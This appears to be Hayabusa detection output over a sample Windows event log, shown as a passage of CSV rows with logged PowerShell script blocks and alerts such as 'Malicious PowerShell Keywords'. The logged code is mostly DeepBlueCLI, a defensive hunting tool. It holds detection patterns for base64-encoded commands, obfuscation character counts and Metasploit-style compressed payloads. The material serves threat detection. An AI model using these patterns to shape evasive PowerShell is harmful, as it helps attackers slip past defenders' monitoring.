Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:37.536 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. 
# I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:37.539 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. 
$groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ 
$image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:37.545 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, 
check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:22:37.547 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not 
reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:23:59.512 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? 
"","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:23:59.512 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:23:59.513 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:23:59.514 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local 
variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:24:04.587 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:25:39.074 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:25:40.257 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:25:40.262 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ 
$image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logna",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:25:40.262 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" 
